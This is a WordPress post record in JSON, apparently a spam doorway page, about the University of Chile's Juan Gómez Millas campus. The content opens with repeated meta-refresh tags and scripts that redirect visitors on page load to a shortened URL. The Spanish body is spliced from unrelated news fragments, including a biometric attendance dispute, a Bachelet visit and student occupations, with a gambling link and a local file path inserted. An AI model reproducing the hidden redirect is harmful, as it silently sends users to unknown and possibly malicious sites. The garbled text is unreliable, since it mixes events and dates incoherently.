{"id":318536,"date":"2025-09-17T23:56:37","date_gmt":"2025-09-17T21:56:37","guid":{"rendered":"https:\/\/invengenio.com\/?p=318536"},"modified":"2025-09-17T23:58:21","modified_gmt":"2025-09-17T21:58:21","slug":"campus-juan-gomez-millas-14","status":"publish","type":"post","link":"https:\/\/invengenio.com\/index.php\/2025\/09\/17\/campus-juan-gomez-millas-14\/","title":{"rendered":"\u00bb Campus Juan G\u00f3mez Millas"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.org\/VMCivyawF0r8\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.org\/VMCivyawF0r8\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.org\/VMCivyawF0r8\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.org\/VMCivyawF0r8\";<\/script><\/p>\n<p>En JGM, en tanto, se ha instalado en algunos sectores en modalidad de marcha blanca, pero a\u00fan no est\u00e1 activo de forma generalizada. \u201cSomos 8.000 trabajadoras y trabajadores quienes estar\u00edamos obligados a marcar as\u00ed, mientras que el estamento acad\u00e9mico no. Es grave que Rector\u00eda no haya entregado informaci\u00f3n clara sobre este proceso, que afecta directamente nuestra privacidad y nuestros derechos laborales\u201d, advierte Constanza Heredia, presidenta de la asociaci\u00f3n de funcionarios del campus. La implementaci\u00f3n de un nuevo sistema de control de asistencia de trabajadores basado en reconocimiento facial y huella dactilar ha desatado una fuerte controversia en el Campus Juan G\u00f3mez Millas (JGM) de la Universidad de Chile. El modelo, que reemplaza el tradicional reloj de marcaje, fue dise\u00f1ado por la Vicerrector\u00eda de Tecnolog\u00edas de la Informaci\u00f3n (VTI) e implica la adquisici\u00f3n de 62 dispositivos distribuidos en distintas unidades de la casa de estudios.<\/p>\n<p>En el campus se encuentran las facultades de Ciencias Sociales, de Filosof\u00eda y Humanidades, de Artes, de Ciencias, el Instituto de la Comunicaci\u00f3n e Imagen y el Programa Acad\u00e9mico de Bachillerato. En conjunto, estas unidades imparten 25 carreras de pregrado, con una matr\u00edcula total para el a\u00f1o 2021 de 7.978 estudiantes. El recorrido de las autoridades precisamente incluy\u00f3 una visita a la&nbsp;Plataforma Cultural, un recinto de 9 mil metros cuadrados que se inaugurar\u00e1 el primer semestre de 2022. En \u00e9l funcionar\u00e1 un teatro experimental, salas de exhibici\u00f3n y un microcine, adem\u00e1s de la colecci\u00f3n del Museo de Arte Popular Americano Tom\u00e1s Lago.<\/p>\n<ul>\n<li>El proceso de renovaci\u00f3n del campus parti\u00f3 en 2006, durante el primer gobierno de Michelle Bachelet, cuando el rector de entonces, V\u00edctor P\u00e9rez, impuls\u00f3 un proyecto de desarrollo que dos a\u00f1os m\u00e1s tarde se convirti\u00f3 en una Iniciativa Bicentenario.<\/li>\n<li>De Chile avanza en la instalaci\u00f3n del sistema en todos sus campus -seg\u00fan lo aprobado en el marco presupuestario 2024 por un total de $136 millones-.<\/li>\n<li>En primer lugar, por supuesto, est\u00e1n este grupo de personas que sale a combatir con Carabineros escondidos bajo las pa\u00f1oletas y llamados \u201cencapuchados\u201d o \u201ccapuchas\u201d.<\/li>\n<li>Una vez m\u00e1s, como ocurre habitualmente en la semana del 11 de septiembre, el campus Juan G\u00f3mez Millas de la Universidad de Chile ser\u00e1 cerrado.<\/li>\n<li>Un jard\u00edn infantil JUNJI y edificios nuevos para las facultades de Filosof\u00eda y Humanidades y de Ciencias Sociales, son otras de las innovaciones que se realizaron en el campus.<\/li>\n<li>Los estudiantes de Artes, en tanto, optaron por mantener la toma de una de las sedes de su facultad en el campus, en el pasaje Las Encinas.<\/li>\n<\/ul>\n<h2>NYT destaca a astr\u00f3nomo chileno que lucha por mantener la &quot;oscuridad&quot; en el Desierto de Atacama<\/h2>\n<p>El rector agradeci\u00f3 el impulso de la expresidenta Bachelet para lograr que \u201clo imposible haya sido posible\u201d. Este septiembre disfruta de los descuentos de la Ruta del Vino, a un precio especial los 3 primeros meses. Este jueves se dar\u00e1 fin a la toma estudiantil del campus Juan G\u00f3mez Millas de la Universidad de Chile, ubicado en \u00d1u\u00f1oa.<\/p>\n<h3>Universidad de Chile, Campus Juan G\u00f3mez Millas<\/h3>\n<p>Los estudiantes de Artes, en tanto, optaron por mantener la toma de una de las sedes de su facultad en el campus, en el pasaje Las Encinas. El jueves ser\u00e1 entregado el campus por los participantes de la toma a las 08.00 horas y el retorno a clases presenciales ser\u00e1 el lunes 1 de julio. En el comunicado, dicen considerar que los temas pactados \u201cson los mejores para garantizar el bienestar acad\u00e9mico y estudiantil en el porvenir de las movilizaciones y la vuelta a clases\u201d. \u201cNos preocupa que nuevamente seamos nosotros y nosotras, trabajadores no acad\u00e9micos, el \u00fanico estamento sometido a este tipo de vigilancia\u201d, afirma AFUCH en su declaraci\u00f3n. En el documento, la universidad invoca su facultad para organizar su funcionamiento interno y detalla que el sistema busca garantizar \u201cun control preciso y seguro de asistencia\u201d, adem\u00e1s de mejorar la eficiencia institucional. Las bases exigen, adem\u00e1s, que las empresas oferentes presenten una pol\u00edtica de seguridad de datos personales y un programa de integridad.<\/p>\n<h2>UTEM colabora con Universidad de Chile en el mapeo del Campus Juan G\u00f3mez Millas<\/h2>\n<p>Incluye adem\u00e1s dependencias habilitadas para la carrera de Cine y Televisi\u00f3n del Instituto de la Comunicaci\u00f3n e Imagen (ICEI), la Cineteca de la U. El lugar aspira a convertirse en un polo cultural para la Regi\u00f3n Metropolitana y especialmente para las comunas de Macul, \u00d1u\u00f1oa y Pe\u00f1alol\u00e9n. Desde la Universidad de Chile, en tanto, la respuesta a este medio es que \u201cen el marco del proceso de renovaci\u00f3n de su parque tecnol\u00f3gico, la Universidad de Chile inici\u00f3 la implementaci\u00f3n <a href=\"https:\/\/partamos.cl\/juego\/sweet-bonanza\/\">Tutorial de cascada de s\u00edmbolos y grandes combos<\/a> de un sistema de lectura biom\u00e9trica para el control de asistencia de sus funcionarios y funcionarias. El nuevo sistema responde a la necesidad de reemplazar dispositivos con m\u00e1s de 20 a\u00f1os de funcionamiento (\u2026) y fue adjudicado a trav\u00e9s de un proceso de licitaci\u00f3n p\u00fablica que cumple con el resguardo y protecci\u00f3n de datos personales\u201d. Se construyeron aularios para acoger al estudiantado, nuevos edificios para diferentes unidades acad\u00e9micas, un Campo Deportivo para la comunidad universitaria y la Plataforma Cultural que fomentar\u00e1 la vinculaci\u00f3n con el medio y la protecci\u00f3n y divulgaci\u00f3n de las artes y el patrimonio.<\/p>\n<h3>&quot;Si hubiese tenido un arma&#8230;&quot;: los descargos del ex juez que sufri\u00f3 un turbazo en su casa en La Pintana<\/h3>\n<p><img decoding=\"async\" class=\"aligncenter\" style=\"display: block;margin-left:auto;margin-right:auto;\" width=\"606px\" alt=\"juan gomez millas campus\" src=\"C:\\Users\\\u0412\u043e\u043b\u043e\u0434\u0438\u043c\u0438\u0440\\AppData\\Roaming\\scm-next-plus\\content_cache\\68bfd6009ce8860a9cdafc1c\\cache\\juan gomez millas campus\\images\\juan_gomez_millas_campus_(12).jpeg\"\/><\/p>\n<p>De Chile avanza en la instalaci\u00f3n del sistema en todos sus campus -seg\u00fan lo aprobado en el marco presupuestario 2024 por un total de $136 millones-. Pese a estos est\u00e1ndares administrativos, los funcionarios alegan que no se ha transparentado p\u00fablicamente c\u00f3mo se gestionar\u00e1n los datos recolectados ni se ha informado si existir\u00e1 la posibilidad de no enrolarse. Por su parte, la expresidenta destac\u00f3 que la renovaci\u00f3n de JGM&nbsp;\u201ces una oportunidad extraordinaria frente a enormes desaf\u00edos y enormes esperanzas que tiene el pa\u00eds frente a la Convenci\u00f3n Constitucional y a un nuevo gobierno\u201d. La Alta Comisionada para los Derechos Humanos de Naciones Unidas, Michelle Bachelet, visit\u00f3 este viernes el campus Juan G\u00f3mez Millas de la Universidad de Chile, en la comuna de \u00d1u\u00f1oa, para conocer las obras que se han desarrollado en el recinto la \u00faltima d\u00e9cada. &quot;Hemos alcanzado un acuerdo y elaborado una agenda de trabajo conjunta&quot;, anunci\u00f3 un comunicado de las facultades del campus Juan G\u00f3mez Millas de la Universidad de Chile, con lo que termin\u00f3 la toma del recinto por parte de estudiantes.<\/p>\n<p>En conclusi\u00f3n, la Universidad de Chile, y en particular la comunidad universitaria del campus Juan G\u00f3mez Millas, no est\u00e1 haciendo absolutamente nada por solucionar los problemas que todos los a\u00f1os aquejan a nuestra casa de estudios. Prefieren cerrar el campus para evitar que haya alg\u00fan tipo de da\u00f1o o perjuicio tanto material como humano al interior del recinto, lo cual es muy l\u00f3gico, sin embargo, esto se ha vuelto una tradici\u00f3n y se est\u00e1 perpetuando una mala costumbre. Mala costumbre porque es secreto a voces que los desmanes a veces se hacen \u00fanica y exclusivamente para perder clases, lo cual es falso porque esas clases se recuperan se quiera o no. El Campus Juan G\u00f3mez Millas lleva el nombre del educador y ministro de la cartera, quien fue rector del plantel entre los a\u00f1os 1953 y 1963.<\/p>\n<p>El proceso al que hacen referencia <a href=\"https:\/\/www.liceojgm.cl\/\">juan gomez millas campus<\/a> fue formalizado mediante la Resoluci\u00f3n Exenta N\u00b0 2523 del 10 de diciembre de 2024, la cual aprueba las bases administrativas y t\u00e9cnicas para la licitaci\u00f3n de estos dispositivos. Y es que la Asociaci\u00f3n de Funcionarios y Funcionarias de la Facultad de Filosof\u00eda y Humanidades (AFUCH) acusa que el sistema -instalado el pasado 3 de junio- ha sido \u201cimpuesto sin di\u00e1logo ni consentimiento informado\u201d. En primer lugar, por supuesto, est\u00e1n este grupo de personas que sale a combatir con Carabineros escondidos bajo las pa\u00f1oletas y llamados \u201cencapuchados\u201d o \u201ccapuchas\u201d. Hay algunos que son alumnos de la Universidad y otros que son de afuera, de hecho, los mismos alumnos son capaces de reconocer a algunos de ellos con s\u00f3lo caminar por el campus. La ex mandataria, en tanto, expres\u00f3 que \u201cla historia va a seguir avanzando pero ser\u00e1 siempre m\u00e1s esperanzadora con universidades comprometidas con el devenir de las mayor\u00edas.<\/p>\n<p>\u201cLa negociaci\u00f3n permiti\u00f3 establecer l\u00edmites y pisos m\u00ednimos comunes, considerando las leg\u00edtimas diferencias entre estudiantes y autoridades acad\u00e9micas\u201d, continua el escrito. Es la instituci\u00f3n de educaci\u00f3n superior m\u00e1s antigua del pa\u00eds y una de las de mayor prestigio y tradici\u00f3n de Am\u00e9rica Latina, como lo prueban diferentes reconocimientos nacionales e internacionales. Sumemos a esto que, al parecer, no se pretende que se haga nada al respecto, puesto que quienes deseamos terminar con este tipo de situaciones no tenemos el apoyo de NADIE.<\/p>\n<p>Los avances que hoy he presenciado me alegran profundamente, me alegran por la Universidad de Chile y me alegran por el pa\u00eds\u201d. \u201cExtendemos una invitaci\u00f3n abierta a toda la comunidad universitaria para participar en esta agenda de trabajo y construir un mejor Campus para sus m\u00e1s de 12 mil integrantes, contribuyendo as\u00ed a una Universidad de Chile en la que toda su comunidad se sienta considerada y avance por los caminos del di\u00e1logo\u201d. En esa l\u00ednea apuntaron que para ello, \u201chemos trabajado en base a los principios de democracia y participaci\u00f3n, posibilitando establecer un di\u00e1logo entre participantes y resolver as\u00ed los temas en discusi\u00f3n con propuestas de implementaci\u00f3n espec\u00edficas, atendiendo a la diversidad de requerimientos con un sentido de bien com\u00fan institucional\u201d. En Artes, reclaman por un \u201cun abandono econ\u00f3mico y administrativo que se ha extendido por a\u00f1os\u201d, acusando deterioro de sus instalaciones e infraestructura.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>En JGM, en tanto, se ha instalado en algunos sectores en modalidad de marcha blanca, pero a\u00fan no est\u00e1 activo de forma generalizada. \u201cSomos 8.000 trabajadoras y trabajadores quienes estar\u00edamos obligados a marcar as\u00ed, mientras que el estamento acad\u00e9mico no. Es grave que Rector\u00eda no haya entregado informaci\u00f3n clara sobre este proceso, que afecta directamente [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[315],"tags":[],"class_list":["post-318536","post","type-post","status-publish","format-standard","hentry","category-liceojgm-cl"],"_links":{"self":[{"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/posts\/318536"}],"collection":[{"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/comments?post=318536"}],"version-history":[{"count":1,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/posts\/318536\/revisions"}],"predecessor-version":[{"id":318537,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/posts\/318536\/revisions\/318537"}],"wp:attachment":[{"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/media?parent=318536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/categories?post=318536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/invengenio.com\/index.php\/wp-json\/wp\/v2\/tags?post=318536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}